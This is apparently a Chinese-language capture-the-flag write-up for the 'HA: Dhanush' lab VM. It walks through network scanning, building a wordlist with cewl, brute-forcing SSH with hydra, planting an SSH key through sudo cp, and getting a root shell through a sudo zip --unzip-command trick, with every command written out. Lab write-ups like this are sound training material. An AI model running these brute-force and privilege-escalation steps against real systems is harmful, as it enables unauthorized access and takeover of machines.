文章目录

  • 一、信息收集
    • 1.主机发现
    • 2.端口扫描
    • 3.查看 web 服务
  • 二、漏洞挖掘
    • 1.使用 cewl 生成字典
    • 2.使用 hydra 进行爆破
    • 3.ssh 连接
    • 4.尝试 sudo 提权

靶机介绍:

一、信息收集

1.主机发现

arp-scan -l


发现靶机 ip:192.168.1.119

2.端口扫描

nmap -A -p- 192.168.1.119


发现开放了 80 端口,Apache 服务,ubuntu系统;
65345 端口,ssh 服务

3.查看 web 服务

访问 192.168.1.119:

发现介绍 dhanush,没有什么特别的

二、漏洞挖掘

1.使用 cewl 生成字典

没有什么信息,根据提示:枚举,我们尝试从靶机的 web 服务生成 ssh 登陆的账号密码进行遍历爆破


cewl http://192.168.1.119/ -w dict.txt    #生成密码
john --wordlist=dict.txt --stdout --rules > ./users.txt    #生成用户名列表

2.使用 hydra 进行爆破

hydra -L ./users.txt -P ./dict.txt 192.168.1.119 ssh -s 65345 -e nsr -t 30

爆破时间较长,大概需要 10 分钟左右

3.ssh 连接

ssh pinak@192.168.1.119 -p 65345
yes
Gandiv

4.尝试 sudo 提权


发现可以以 sarang 用户权限使用 cp,查看该用户信息


发现 sarang 路径下有 .ssh 目录,尝试进入但是没有权限,结合 sudo -l 得到的可以 sarang 权限执行 cp ,尝试在当前用户创建 ssh,将公钥复制到 sarang 路径去然后使用 ssh 连接

cd ~
ssh-keygen    #生成ssh密钥(我这里是一直回车无密码)
chmod 777 ./.ssh/id_rsa.pub
cp .ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -i /.ssh/id_rsa -p 65345



经过一番操作可以看到我们进入了 sarang 用户
再次尝试 sudo 提权

发现可以以 root 权限执行 zip 命令,进行利用获得 root 权限

touch dhanush
sudo zip /tmp/dhanush.zip /home/sarang/dhanush -T --unzip-command="sh -c /bin/bash"
cd /root

HA: Dhanush靶机渗透测试相关推荐

  1. HA: InfinityStones靶机渗透测试

    文章目录 靶机信息 一.信息收集 1.主机发现 2.端口扫描 3.目录扫描 二.漏洞挖掘 1.访问 192.168.1.108 2.访问 /img 目录 3.访问 https 服务(443)端口 4. ...

  2. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  3. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  4. DC-2靶机渗透测试流程

    目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. ​四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...

  5. 靶机渗透测试(covfefe)

    靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...

  6. 靶机渗透测试(Tre: 1)

    靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...

  7. CH4INRULZ靶机渗透测试

    CH4INRULZ靶机渗透测试 环境 工具 流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searc ...

  8. DC-3靶机渗透测试

    DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...

  9. 靶机渗透测试(unknowndevice64: 1)

    靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...

最新文章

  1. Interview:算法岗位面试—10.15下午—上海某公司算法岗位(偏机器学习,合资制造行业)技术面试考点之电话面试—研究项目的技术考察
  2. 已安装内存和可用内存不一致 4GB内存在win1064位系统中显示为可用 3.87GB解决办法
  3. 这个学期的总结,下个学期比较坑的事情和要注意的点
  4. 启明云端1.54寸串口屏使用经验分享
  5. WEB接口测试之Jmeter接口测试自动化 (二)(数据分离)
  6. laravel $request 多维数组取值_大白话 Laravel 中间件
  7. 安装itunes需要管理员身份_ITUNES无法安装,提示没有权限如何解决?
  8. 实战:Redis 集群模式(下)
  9. 查看mysql是否启用安全审计_如何查看oracle是否开启了审计功能?
  10. RabbitMQ学习之基于spring-rabbitmq的RPC远程调用
  11. 10-windows下的Orcale报错ORA-01031: 权限不足
  12. 差速移动机器人之位姿整定
  13. 4 个拥有绝佳命令行界面的终端程序
  14. Camshift算法
  15. 番外5. Python OpenCV 中滑动条详细说明与常见问题解决方案
  16. 移动终端开发详解总结(一)(kotlin版)| CSDN创作打卡
  17. element-ui的Progress进度条,当前状态样色和背景色的设置
  18. MySQL主从同步(一主一从、一主多从、主从从)等结构的概述与配置
  19. 一政网好吗,考公务员报班的作用
  20. 自己动手写CSDN博客提取器源码分析之三:处理网页保存为pdf文件

热门文章

  1. SpringBoot2.3 修改响应头、添加更新token、解决在过滤器中修改失败
  2. Ubuntu 16.04中安装VMware Tools
  3. ImportError: DLL load failed: 找不到指定的模块。 TensorFlow 1.13
  4. NLP进阶之(七)膨胀卷积神经网络
  5. LeetCode简单题之按键持续时间最长的键
  6. 通俗易懂的Go协程的引入及GMP模型简介
  7. 智能驾驶计算平台算力技术
  8. TVM部署预定义模型
  9. Python:新浪网分类资讯爬虫
  10. 2个RecyclerView 联动